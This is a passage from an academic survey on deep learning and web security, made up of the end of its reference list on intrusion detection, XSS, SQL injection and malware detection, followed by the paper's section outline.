Salakhutdinov, Reducing the dimensionality of data with neural networks, Science 313(5786) (2006), 504–507. doi:10.1126/science.1127647.

52.

Hochreiter and

Schmidhuber, Long short-term memory, Neural Comput. 9(8) (1997), 1735–1780. doi:10.1162/neco.1997.9.8.1735.

53.

Hou,

Saas,

Chen and

Ye, Deep4maldroid: A deep learning framework for Android malware detection based on Linux kernel system call graphs, in: 2016 IEEE/WIC/ACM International Conference on Web Intelligence Workshops (WIW), 2016, pp. 104–111.

54.

Hu,

Zhang and

Yang, Security risk situation quantification method based on threat prediction for multimedia communication network, Multimed. Tools Appl. 77(16) (2018), 21693–21723. doi:10.1007/s11042-017-5602-0.

55.

Huluka and

Popov, Root cause analysis of session management and broken authentication vulnerabilities, in: World Congress on Internet Security (WorldCIS-2012), 2012, pp. 82–86.

56.

Husák,

Komárková,

Bou-Harb and

Čeleda, Survey of attack projection, prediction, and forecasting in cyber security, IEEE Commun. Surv. Tutorials 21(1) (2018), 640–660. doi:10.1109/COMST.2018.2871866.

57.

Idhammad,

Afdel and

Belouch, Semi-supervised machine learning approach for DDoS detection, Appl. Intell. 48(10) (2018), 3193–3208. doi:10.1007/s10489-018-1141-2.

58.

A.K.

Jain and

B.B.

Gupta, A machine learning based approach for phishing detection using hyperlinks information, J. Ambient Intell. Humaniz. Comput. 10(5) (2019), 2015–2028. doi:10.1007/s12652-018-0798-z.

59.

Javaid,

Niyaz,

Sun and

Alam, A deep learning approach for network intrusion detection system, Eai Endorsed Trans. Secur. Saf. 3(9) (2016), e2.

60.

Jemal,

Cheikhrouhou,

Hamam and

Mahfoudhi, Sql injection attack detection and prevention techniques using machine learning, Int. J. Appl. Eng. Res. 15(6) (2020), 569–580.

61.

Y.-S.

Jeong,

Woo and

A.R.

Kang, Malware detection on byte streams of pdf files using convolutional neural networks, Secur. Commun. Networks 2019 (2019).

62.

P.G.

Jeya,

Ravichandran and

C.S.

Ravichandran, Efficient classifier for R2L and U2R attacks, Int. J. Comput. Appl. 45(21) (2012), 28–32.

63.

Jia,

Huang,

Liu and

Ma, A DDoS attack detection method based on hybrid heterogeneous multiclassifier ensemble learning, J. Electr. Comput. Eng. 2017 (2017).

64.

Jian,

Ke and

Guosheng, Network security situation automatic prediction model based on accumulative CMA-ES optimization, J. China Univ. Posts Telecommun. 24(3) (2017), 33–43. doi:10.1016/S1005-8885(17)60209-7.

65.

Johari and

Sharma, A survey on web application vulnerabilities (SQLIA, XSS) exploitation and security engine for SQL injection, in: 2012 International Conference on Communication Systems and Network Technologies, 2012, pp. 453–458. doi:10.1109/CSNT.2012.104.

66.

Jovanovic,

Kirda and

Kruegel, Preventing cross site request forgery attacks, in: 2006 Securecomm and Workshops, 2006, pp. 1–10.

67.

Junjin, An approach for SQL injection vulnerability detection, in: 2009 Sixth International Conference on Information Technology: New Generations, 2009, pp. 1411–1414.

68.

Kalash,

Rochan,

Mohammed,

N.D.B.

Bruce,

Wang and

Iqbal, Malware classification with deep convolutional neural networks, in: 2018 9th IFIP International Conference on New Technologies, Mobility and Security (NTMS), 2018, pp. 1–5.

69.

Karaman,

Ã.

Hayrettin and

Aybar, Institutional cybersecurity from military perspective, Int. J. Inf. Secur. Sci. 5(1) (2016), 1–7.

70.

Katzir and

Elovici, Quantifying the resilience of machine learning classifiers used for cyber security, Expert Syst. Appl. 92 (2018), 419–429. doi:10.1016/j.eswa.2017.09.053.

71.

I.F.

Kilincer,

Ertam and

Sengur, Machine learning methods for cyber security intrusion detection: Datasets and comparative study, Comput. Networks 188 (2021), 107840. doi:10.1016/j.comnet.2021.107840.

72.

B.-H.

Kim,

K.-C.

Kim,

S.-E.

Hong and

S.-Y.

Oh, Development of cyber information security education and training system, Multimed. Tools Appl. 76(4) (2017), 6051–6064. doi:10.1007/s11042-016-3495-y.

73.

Kirda,

Kruegel,

Vigna and

Jovanovic, Noxes: A client-side solution for mitigating cross-site scripting attacks, in: Proceedings of the 2006 ACM Symposium on Applied Computing, 2006, pp. 330–337. doi:10.1145/1141277.1141357.

74.

J.Z.

Kolter and

M.A.

Maloof, Learning to detect malicious executables in the wild, in: Proceedings of the Tenth ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, 2004, pp. 470–478. doi:10.1145/1014052.1014105.

75.

Kumar, Mitigating the authentication vulnerabilities in web applications through security requirements, in: 2011 World Congress on Information and Communication Technologies, 2011, pp. 1294–1298. doi:10.1109/WICT.2011.6141435.

76.

Kumar,

Mahajan,

Kumar and

S.K.

Khatri, A study on web application security and detecting security vulnerabilities, in: 2017 6th International Conference on Reliability, Infocom Technologies and Optimization (Trends and Future Directions) (ICRITO), 2017, pp. 451–455. doi:10.1109/ICRITO.2017.8342469.

77.

Kwon,

Kim,

S.C.

Suh,

Kim and

K.J.

Kim, A survey of deep learning-based network anomaly detection, Cluster Comput. 22(1) (2019), 949–961. doi:10.1007/s10586-017-1117-8.

78.

Lezzi,

Lazoi and

Corallo, Cybersecurity for Industry 4.0 in the current literature: A reference framework, Comput. Ind. 103 (2018), 97–110. doi:10.1016/j.compind.2018.09.004.

79.

Li and

Liu, Situation element extraction of network security based on logistic regression and improved particle swarm optimization, in: 2013 Ninth International Conference on Natural Computation (ICNC), 2013, pp. 569–573. doi:10.1109/ICNC.2013.6818041.

80.

Li and

Liu, A comprehensive review study of cyber-attacks and cyber security; emerging trends and recent developments, Energy Reports 7 (2021), 8176–8186. doi:10.1016/j.egyr.2021.08.126.

81.

et al., Vuldeepecker: A deep learning-based system for vulnerability detection, 2018. arXiv:Prepr.arXiv1801.01681.

82.

Liang and

Pan, Research on intrusion detection based on improved DBN-ELM, in: 2019 International Conference on Communications, Information System and Computer Engineering (CISCE), 2019, pp. 495–499. doi:10.1109/CISCE.2019.00115.

83.

H.-J.

Liao,

C.-H.R.

Lin,

Y.-C.

Lin and

K.-Y.

Tung, Intrusion detection system: A comprehensive review, J. Netw. Comput. Appl. 36(1) (2013), 16–24. doi:10.1016/j.jnca.2012.09.004.

84.

Lin

et al., Cross-project transfer representation learning for vulnerable function discovery, IEEE Trans. Ind. Informatics 14(7) (2018), 3289–3297. doi:10.1109/TII.2018.2821768.

85.

Lin,

Jiang,

Y.-L.

Qi,

S.-Q.

Yang and

A.-P.

Li, Construction of index system based on advanced persistent threat, in: ITM Web of Conferences, Vol. 12, 2017, p. 3009.

86.

S.J.

Lincke and

Adavi, Modeling security risk with three views, in: 2019 Spring Simulation Conference (SpringSim), 2019, pp. 1–12.

87.

A.X.

Liu,

J.M.

Kovacs and

M.G.

Gouda, A secure cookie scheme, Comput. Networks 56(6) (2012), 1723–1730. doi:10.1016/j.comnet.2012.01.013.

88.

Liu,

Yu,

Lv,

Yu,

Wang and

Wu, Network security situation: From awareness to awareness-control, J. Netw. Comput. Appl. 139 (2019), 15–30. doi:10.1016/j.jnca.2019.04.022.

89.

Lopez-Martin,

Carro,

Sanchez-Esguevillas and

Lloret, Conditional variational autoencoder for prediction and feature recovery applied to intrusion detection in iot, Sensors 17(9) (2017), 1967. doi:10.3390/s17091967.

90.

Lu and

Lei, Study on security framework in e-commerce, in: 2007 International Conference on Wireless Communications, Networking and Mobile Computing, 2007, pp. 3541–3544.

91.

Lu and

Da Xu, Internet of things (IoT) cybersecurity research: A review of current research topics, IEEE Internet Things J. 6(2) (2018), 2103–2115. doi:10.1109/JIOT.2018.2869847.

92.

Ma,

L.K.

Saul,

Savage and

G.M.

Voelker, Beyond blacklists: Learning to detect malicious web sites from suspicious URLs, in: Proceedings of the 15th ACM SIGKDD International Conference on Knowledge Discovery and Data Mining, 2009, pp. 1245–1254. doi:10.1145/1557019.1557153.

93.

Mahdavifar and

A.A.

Ghorbani, Application of deep learning to cybersecurity: A survey, Neurocomputing 347 (2019), 149–176. doi:10.1016/j.neucom.2019.02.056.

94.

V.K.

Malviya,

Saurav and

Gupta, On security issues in web applications through cross site scripting (XSS), in: 2013 20th Asia-Pacific Software Engineering Conference (APSEC), Vol. 1, 2013, pp. 583–588. doi:10.1109/APSEC.2013.85.

95.

Mamadhan,

Manesh and

Paul, SQLStor: Blockage of stored procedure SQL injection attack using dynamic query structure validation, in: 2012 12th International Conference on Intelligent Systems Design and Applications (ISDA), 2012, pp. 240–245. doi:10.1109/ISDA.2012.6416544.

96.

Manjusha and

Ramachandran, Web mining framework for security in e-commerce, in: 2011 International Conference on Recent Trends in Information Technology (ICRTIT), 2011, pp. 1043–1048. doi:10.1109/ICRTIT.2011.5972310.

97.

Mao,

Hu and

Hao, Deep learning for intelligent wireless networks: A comprehensive survey, IEEE Commun. Surv. Tutorials 20(4) (2018), 2595–2621. doi:10.1109/COMST.2018.2846401.

98.

Mao,

Li and

Molloy, Defeating cross-site request forgery attacks with browser-enforced authenticity protection, in: International Conference on Financial Cryptography and Data Security, 2009, pp. 238–255. doi:10.1007/978-3-642-03549-4_15.

99.

A.W.

Marashdih and

Z.F.

Zaaba, Cross site scripting: Detection approaches in web application, Int. J. Adv. Comput. Sci. Appl. 7(10) (2016), 155–160.

100.

Masci,

Meier,

Cireşan and

Schmidhuber, Stacked convolutional auto-encoders for hierarchical feature extraction, in: International Conference on Artificial Neural Networks, 2011, pp. 52–59.

101.

Maza and

Touahria, Feature selection algorithms in intrusion detection system: A survey, KSII Trans. Internet Inf. Syst. 12(10) (2018), 5079–5099.

102.

N.R.

Mead and

Mcgraw, A portal for software security, IEEE Secur. Priv. 3(4) (2005), 75–79. doi:10.1109/MSP.2005.88.

103.

Medeiros,

Neves and

Correia, Detecting and removing web application vulnerabilities with static analysis and data mining, IEEE Trans. Reliab. 65(1) (2015), 54–69. doi:10.1109/TR.2015.2457411.

104.

Meneely and

Williams, Secure open source collaboration: An empirical study of linus’ law, in: Proceedings of the 16th ACM Conference on Computer and Communications Security, 2009, pp. 453–462.

105.

Mishra,

Varadharajan,

Tupakula and

E.S.

Pilli, A detailed investigation and analysis of using machine learning techniques for intrusion detection, IEEE Commun. Surv. Tutorials 21(1) (2018), 686–728. doi:10.1109/COMST.2018.2847722.

106.

Mittal,

Joshi and

Finin, Cyber-all-intel: An ai for security related threat intelligence, 2019. arXiv:Prepr.arXiv1905.02895.

107.

T.S.

Mohamed, Analytical view of web security and sophisticated ways to improve web security, Journal of Physics: Conference Series 1530(1) (2020), 12023.

108.

Mohammadi,

Al-Fuqaha,

Sorour and

Guizani, Deep learning for IoT big data and streaming analytics: A survey, IEEE Commun. Surv. Tutorials 20(4) (2018), 2923–2960. doi:10.1109/COMST.2018.2844341.

109.

I.A.

Mohammed, Artificial intelligence for cybersecurity: A systematic mapping of literature, Artif. Intell. 7(9) (2020).

110.

Moosa, Artificial neural network based web application firewall for SQL injection, Int. J. Comput. Inf. Eng. 4(4) (2010), 610–619.

111.

V.R.

Mouli and

K.P.

Jevitha, Web services attacks and security – A systematic literature review, Procedia Comput. Sci. 93 (2016), 870–877. doi:10.1016/j.procs.2016.07.265.

112.

Nagaraja,

Boregowda,

Khatatneh,

Vangipuram,

Nuvvusetty and

V.S.

Kiran, Similarity based feature transformation for network anomaly detection, IEEE Access 8 (2020), 39184–39196. doi:10.1109/ACCESS.2020.2975716.

113.

Nataraj,

Karthikeyan,

Jacob and

B.S.

Manjunath, Malware images: Visualization and automatic classification, in: Proceedings of the 8th International Symposium on Visualization for Cyber Security, 2011, pp. 1–7.

114.

Neuhaus,

Zimmermann,

Holler and

Zeller, Predicting vulnerable software components, in: Proceedings of the 14th ACM Conference on Computer and Communications Security, 2007, pp. 529–540. doi:10.1145/1315245.1315311.

115.

Nikiforakis,

Kapravelos,

Joosen,

Kruegel,

Piessens and

Vigna, Cookieless monster: Exploring the ecosystem of web-based device fingerprinting, in: 2013 IEEE Symposium on Security and Privacy, 2013, pp. 541–555. doi:10.1109/SP.2013.43.

116.

Niranjanamurthy and

Chahar, The study of e-commerce security issues and solutions, Int. J. Adv. Res. Comput. Commun. Eng. 2(7) (2013), 2885–2895.

117.

Olabelurin,

Veluru,

Healing and

Rajarajan, Entropy clustering approach for improving forecasting in DDoS attacks, in: 2015 IEEE 12th International Conference on Networking, Sensing and Control, 2015, pp. 315–320. doi:10.1109/ICNSC.2015.7116055.

118.

S.K.

Pal,

Talwar and

Mitra, Web mining in soft computing framework: Relevance, state of the art and future directions, IEEE Trans. neural networks 13(5) (2002), 1163–1177. doi:10.1109/TNN.2002.1031947.

119.

Panda and

Ramani, Protection of web application against SQL injection attacks, Int. J. Mod. Eng. Res. 3(1) (2013), 166–168.

120.

Pant and

C.N.

Khairnar, A cumulative security metric for an information network, Network 3(4) (2014).

121.

J.S.

Park,

Sandhu and

Ghanta, RBAC on the web by secure cookies, in: Research Advances in Database and Information Systems Security, Springer, 2000, pp. 49–62. doi:10.1007/978-0-387-35508-5_4.

122.

Park and

Park, Web application intrusion detection system for input validation attack, in: 2008 Third International Conference on Convergence and Hybrid Information Technology, Vol. 2, 2008, pp. 498–504. doi:10.1109/ICCIT.2008.338.

123.

S.P.

Patro,

Padhy and

Panigrahi, Security issues over E-commerce and their solutions, Int. J. Adv. Res. Comput. Commun. Eng. 5(12) (2016).

124.

Peng,

Kong,

Peng,

Li and

Wang, Network intrusion detection based on deep learning, in: 2019 International Conference on Communications, Information System and Computer Engineering (CISCE), 2019, pp. 431–435. doi:10.1109/CISCE.2019.00102.

125.

Perl

et al., Vccfinder: Finding potential vulnerabilities in open-source projects to assist code audits, in: Proceedings of the 22nd ACM SIGSAC Conference on Computer and Communications Security, 2015, pp. 426–437. doi:10.1145/2810103.2813604.

126.

Pietraszek and

Vanden Berghe, Defending against injection attacks through context-sensitive string evaluation, in: International Workshop on Recent Advances in Intrusion Detection, 2005, pp. 124–145.

127.

Prakash,

Kumar,

R.R.

Kompella and

Gupta, Phishnet: Predictive blacklisting to detect phishing attacks, in: 2010 Proceedings IEEE INFOCOM, 2010, pp. 1–5.

128.

Prasad,

Rohokale,

Prasad and

Rohokale, Artificial intelligence and machine learning in cyber security, Cyber Secur. lifeline Inf. Commun. Technol. (2020), 231–247. doi:10.1007/978-3-030-31703-4_16.

129.

Preethi and

Khare, Sparse auto encoder driven support vector regression based deep learning model for predicting network intrusions, Peer-to-Peer Netw. Appl. 14(4) (2021), 2419–2429. doi:10.1007/s12083-020-00986-3.

130.

Prokhorenko,

K.-K.R.

Choo and

Ashman, Web application protection techniques: A taxonomy, J. Netw. Comput. Appl. 60 (2016), 95–112. doi:10.1016/j.jnca.2015.11.017.

131.

Qin,

Yan,

Ren,

C.W.

Chen and

Wang, Towards efficient privacy-preserving image feature extraction in cloud computing, in: Proceedings of the 22nd ACM International Conference on Multimedia, 2014, pp. 497–506. doi:10.1145/2647868.2654941.

132.

Rafique,

Humayun,

Gul,

Abbas and

Javed, Systematic review of web application security vulnerabilities detection methods, J. Comput. Commun. 3(09) (2015), 28. doi:10.4236/jcc.2015.39004.

133.

Rieck,

Holz,

Willems,

Düssel and

Laskov, Learning and classification of malware behavior, in: International Conference on Detection of Intrusions and Malware, and Vulnerability Assessment, 2008, pp. 108–125.

134.

S.J.

Sadana and

Selam, Analysis of cross site scripting attack, Proc. International Journal of Engineering Research and Applications (IJERA) 1(4) (2011), 1764–1773.

135.

Salakhutdinov and

Larochelle, Efficient learning of deep Boltzmann machines, in: Proceedings of the Thirteenth International Conference on Artificial Intelligence and Statistics, 2010, pp. 693–700.

136.

A.A.

Salih

et al., Deep learning approaches for intrusion detection, Asian J. Res. Comput. Sci. (2021), 50–64. doi:10.9734/ajrcos/2021/v9i430229.

137.

Saravanan and

S.S.

Bama, A review on cyber security and the fifth generation cyberattacks, Orient. J. Comput. Sci. Technol. 12(2) (2019), 50–56. doi:10.13005/ojcst12.02.04.

138.

Saxe and

Berlin, eXpose: A character-level convolutional neural network with embeddings for detecting malicious URLs, file paths and registry keys, 2017. arXiv:1702.08568.

139.

Scott and

Sharp, Specifying and enforcing application-level web security policies, IEEE Trans. Knowl. Data Eng. 15(4) (2003), 771–783. doi:10.1109/TKDE.2003.1208998.

140.

C.D.

Sestili,

W.S.

Snavely and

N.M.

VanHoudnos, Towards security defect prediction with AI, 2018. arXiv:1808.09897.

141.

Shanmugasundaram,

Ravivarman and

Thangavellu, A study on removal techniques of cross-site scripting from web applications, in: 2015 International Conference on Computation of Power, Energy, Information and Communication (ICCPEIC), 2015, pp. 436–442. doi:10.1109/ICCPEIC.2015.7259498.

142.

L.K.

Shar,

L.C.

Briand and

H.B.K.

Tan, Web application vulnerability prediction using hybrid program analysis and machine learning, IEEE Trans. dependable Secur. Comput. 12(6) (2014), 688–707. doi:10.1109/TDSC.2014.2373377.

143.

L.K.

Shar and

H.B.K.

Tan, Automated removal of cross site scripting vulnerabilities in web applications, Inf. Softw. Technol. 54(5) (2012), 467–478. doi:10.1016/j.infsof.2011.12.006.

144.

L.K.

Shar,

H.B.K.

Tan and

L.C.

Briand, Mining SQL injection and cross site scripting vulnerabilities using hybrid program analysis, in: 2013 35th International Conference on Software Engineering (ICSE), 2013, pp. 642–651. doi:10.1109/ICSE.2013.6606610.

145.

Shifflet, A technique independent fusion model for network intrusion detection, Proceedings of the Midstates Conference on Undergraduate Research in Computer Science and Mat hematics 3(1) (2005), 1–3.

146.

Shin,

Son and

Heo, Development of a cyber security risk model using Bayesian networks, Reliab. Eng. Syst. Saf. 134 (2015), 208–217. doi:10.1016/j.ress.2014.10.006.

147.

Shin,

Meneely,

Williams and

J.A.

Osborne, Evaluating complexity, code churn, and developer activity metrics as indicators of software vulnerabilities, IEEE Trans. Softw. Eng. 37(6) (2010), 772–787. doi:10.1109/TSE.2010.81.

148.

Shin and

Williams, Can traditional fault prediction models be used for vulnerability prediction?, Empir. Softw. Eng. 18(1) (2013), 25–59. doi:10.1007/s10664-011-9190-8.

149.

Sicong,

X.I.E.

Xiaoyao and

X.U.

Yang, Intrusion detection method based on a deep convolutional neural network, J. Tsinghua Univ. (Science Technol.) 59(1) (2019), 44–52.

150.

A.T.

Siddiqui and

A.K.

Singh, Secure E-business transactions by securing web services, in: 2012 International Conference on Management of e-Commerce and e-Government, 2012, pp. 79–84. doi:10.1109/ICMeCG.2012.11.

151.

Siddiqui,

M.C.

Wang and

Lee, A survey of data mining techniques for malware detection using file features, in: Proceedings of the 46th Annual Southeast Regional Conference on XX, 2008, pp. 509–510. doi:10.1145/1593105.1593239.

152.

Singh, Review of e-commerce security challenges, Int. J. Innov. Res. Comput. Commun. Eng. 2(2) (2014), 2850–2858.

153.

Singh,

Malik and

Sarkar, E-commerce website quality assessment based on usability, in: 2016 International Conference on Computing, Communication and Automation (ICCCA), 2016, pp. 101–105. doi:10.1109/CCAA.2016.7813698.

154.

Su and

Wassermann, The essence of command injection attacks in web applications, Acm Sigplan Not. 41(1) (2006), 372–382. doi:10.1145/1111320.1111070.

155.

Svenhard and

Radaslic, A penetration test of an Internet service provider: Computer forensics and information security, 2012.

156.

N.F.

Syed,

S.W.

Shah,

Shaghaghi,

Anwar,

Baig and

Doss, Zero trust architecture (ZTA): A comprehensive survey, IEEE Access (2022).

157.

Takamatsu,

Kosuga and

Kono, Automated detection of session management vulnerabilities in web applications, in: 2012 Tenth Annual International Conference on Privacy, Security and Trust, 2012, pp. 112–119. doi:10.1109/PST.2012.6297927.

158.

Tao,

Liu,

Zhao,

Yang and

Wang, Graph database-based network security situation awareness data storage method, EURASIP J. Wirel. Commun. Netw. 2018(1) (2018), 1–12. doi:10.1186/s13638-018-1309-9.

159.

Tian,

Han,

K.-C.

Li,

Liu,

Duan and

Castiglione, An intrusion detection approach based on improved deep belief network, Appl. Intell. 50(10) (2020), 3162–3178. doi:10.1007/s10489-020-01694-4.

160.

Tobiyama,

Yamaguchi,

Shimada,

Ikuse and

Yagi, Malware detection with deep neural network using process behavior, in: 2016 IEEE 40th Annual Computer Software and Applications Conference (COMPSAC), Vol. 2, 2016, pp. 577–582. doi:10.1109/COMPSAC.2016.151.

161.

T.R.

Toma and

M.S.

Islam, An efficient mechanism of generating call graph for JavaScript using dynamic analysis in web application, in: 2014 International Conference on Informatics, Electronics & Vision (ICIEV), 2014, pp. 1–6.

162.

Tripathy and

Mishra, Protective measures in E-commerce to deal with security threats arising out of social issues – A framework, IAEME 4(1) (2013), 12–24.

163.

Tyagi and

Kumar, Evaluation of static web vulnerability analysis tools, in: 2018 Fifth International Conference on Parallel, Distributed and Grid Computing (PDGC), 2018, pp. 1–6.

164.

Votipka,

Stevens,

Redmiles,

Hu and

Mazurek, Hackers vs. testers: A comparison of software vulnerability discovery processes, in: 2018 IEEE Symposium on Security and Privacy (SP), 2018, pp. 374–391. doi:10.1109/SP.2018.00003.

165.

Wang,

Li,

Yang and

Yan, Intrusion detection for WiFi network: A deep learning approach, in: International Wireless Internet Conference, 2018, pp. 95–104.

166.

Wang,

Li and

Guo, Program slicing stored XSS bugs in web application, in: 2011 Fifth International Conference on Theoretical Aspects of Software Engineering, 2011, pp. 191–194. doi:10.1109/TASE.2011.43.

167.

Wang,

Li and

Guo, Reflected XSS vulnerability analysis, Int. Res. J. Comput. Sci. Inf. Syst. 2(2) (2013), 25–33.

168.

Wen,

Guo and

Chen, Network security situation element extraction based on projection pursuit regression, in: 2012 Sixth International Conference on Innovative Mobile and Internet Services in Ubiquitous Computing, 2012, pp. 405–408. doi:10.1109/IMIS.2012.63.

169.

Wijitrisnanto and

Yustianto, HTTPS contribution in web application security: A systematic literature review, in: 2020 International Conference on Information Technology Systems and Innovation (ICITSI), 2020, pp. 347–356. doi:10.1109/ICITSI50517.2020.9264971.

170.

Wu,

Wen,

Xiang and

Zhou, Twitter spam detection: Survey of new approaches and comparative study, Comput. Secur. 76 (2018), 265–284. doi:10.1016/j.cose.2017.11.013.

171.

Wurzinger,

Platzer,

Ludl,

Kirda and

Kruegel, SWAP: Mitigating XSS attacks using a reverse proxy, in: 2009 ICSE Workshop on Software Engineering for Secure Systems, 2009, pp. 33–39. doi:10.1109/IWSESS.2009.5068456.

172.

Xin

et al., Machine learning and deep learning methods for cybersecurity, Ieee access 6 (2018), 35365–35381. doi:10.1109/ACCESS.2018.2836950.

173.

Xu,

Cao,

Ren,

Li and

Feng, Network security situation awareness based on semantic ontology and user-defined rules for Internet of things, IEEE Access 5 (2017), 21046–21056. doi:10.1109/ACCESS.2017.2734681.

174.

Yamaguchi,

Golde,

Arp and

Rieck, Modeling and discovering vulnerabilities with code property graphs, in: 2014 IEEE Symposium on Security and Privacy, 2014, pp. 590–604. doi:10.1109/SP.2014.44.

175.

Yang,

Zeng,

Xu and

Zhang, A network security situation assessment method based on adversarial deep learning, Appl. Soft Comput. 102 (2021), 107096. doi:10.1016/j.asoc.2021.107096.

176.

Yang,

Jin and

Ma, Multi-classification for malicious URL based on improved semi-supervised algorithm, in: 2017 IEEE International Conference on Computational Science and Engineering (CSE) and IEEE International Conference on Embedded and Ubiquitous Computing (EUC), Vol. 1, 2017, pp. 143–150.

177.

Yang,

S.Y.W.

Su and

Lam, A non-repudiation message transfer protocol for e-commerce, in: EEE International Conference on E-Commerce, 2003. CEC 2003, 2003, pp. 320–327. doi:10.1109/COEC.2003.1210267.

178.

et al., Detecting malicious web requests using an enhanced textcnn, in: 2020 IEEE 44th Annual Computers, Software, and Applications Conference (COMPSAC), 2020, pp. 768–777. doi:10.1109/COMPSAC48688.2020.0-167.

179.

Yulianton,

Warnars,

Soewito,

F.L.

Gaol and

Abdurachman, Web security and vulnerability: A literature review, Journal of Physics: Conference Series 1477(2) (2020), 22028.

180.

Zeadally,

Adi,

Baig and

I.A.

Khan, Harnessing artificial intelligence capabilities to improve cybersecurity, Ieee Access 8 (2020), 23817–23837. doi:10.1109/ACCESS.2020.2968045.

181.

Zeller and

E.W.

Felten, Cross-site request forgeries: Exploitation and prevention, New York Times (2008), 1–13.

182.

Zhang,

Yi,

Wang,

Cao and

Duan, Network security situation awareness framework based on threat intelligence, C. Comput. Mater. Contin. 56(3) (2018), 381–399.

183.

Zhang,

Huang,

Qi and

Guan, Combining static and dynamic analysis to discover software vulnerabilities, in: 2011 Fifth International Conference on Innovative Mobile and Internet Services in Ubiquitous Computing, 2011, pp. 175–181. doi:10.1109/IMIS.2011.59.

184.

Zhang,

Zhao and

LeCun, Character-level convolutional networks for text classification, Adv. Neural Inf. Process. Syst. 28 (2015), 649–657.

185.

Zhang,

Chen,

Jin,

Wang and

Guo, Network intrusion detection: Based on deep hierarchical network and original flow data, IEEE Access 7 (2019), 37004–37016. doi:10.1109/ACCESS.2019.2905041.

186.

Zhou,

Sun,

Liu and

Lau, A C-LSTM neural network for text classification, 2015. arXiv:1511.08630.

187.

Zhu,

Ye,

Wang and

C.-Z.

Xu, A deep learning approach for network anomaly detection based on AMF-LSTM, in: IFIP International Conference on Network and Parallel Computing, 2018, pp. 137–141. doi:10.1007/978-3-030-05677-3_13.

188.

Zhuo,

Zhang and

Gong, Network situation assessment based on RST, in: 2008 IEEE Pacific-Asia Workshop on Computational Intelligence and Industrial Application, Vol. 1, 2008, pp. 502–506. doi:10.1109/PACIIA.2008.133.

Deep learning trends and future perspectives of web security and vulnerabilities

Abstract

Keywords

1. Introduction

2. Theory of web security and vulnerabilities

2.3. Artificial intelligence and web security

3. Types of security vulnerabilities

3.2. Broken authentication and session management

3.3. Cross-site scripting

3.3.1. Stored XSS

3.3.2. Reflected XSS

3.3.3. DOM-based XSS

3.3.4. Induced XSS

3.4. Insecure direct object references

3.5. Security misconfiguration

3.6. Sensitive data exposure

3.7. Missing access level control

3.8. Cross-site request forgery (CSRF)

3.9. Components with known vulnerabilities

3.10. Unvalidated redirects and forwards

4. Attack impacts (low, medium, high)

4.1. High level

4.2. Medium level

4.3. Low level

5. Comparison between static, dynamic, and hybrid tools

6. Security threats

6.1. Denial of services

6.2. Unauthorized access

6.3. Data alteration and message reply

6.4. Identify spoofing

6.5. Security (theft and fraud)

7. E-commerce security

7.1. Digital E-commerce cycle

7.2.1. Data confidentially

7.2.4. Data integrity

7.4. E-commerce security tools

7.5. Data mining techniques to secure E-commerce website

7.5.1. Web structure mining

7.5.2. Web content mining

8. Ways to secure web and avoid vulnerabilities

8.1. How to improve the website?

8.1.1. Update

8.1.2. Passwords

8.1.3. One site = one container

8.1.4. Sensible user access

8.1.5. Change CMS settings

8.1.6. Extension selection

8.1.7. Backups

8.1.8. Server configuration files

8.1.9. Install SSL

8.2. Avoid vulnerabilities

8.2.1. Protection against injection attack

8.2.2. Protection against broken authentication and session management

8.2.3. Protection against XSS attacks

8.2.4. Protection against insecure direct object references

8.2.5. Protection against sensitive data exposure

8.2.6. Protection against CSRF

8.2.7. Protection against invalidated redirects and forwards

8.3. Machine learning and deep learning for web security

8.3.1. Machine learning algorithms

9. Discussion and limitations

Footnotes

Acknowledgements

Conflict of interest

Ethical approval and consent to participate

References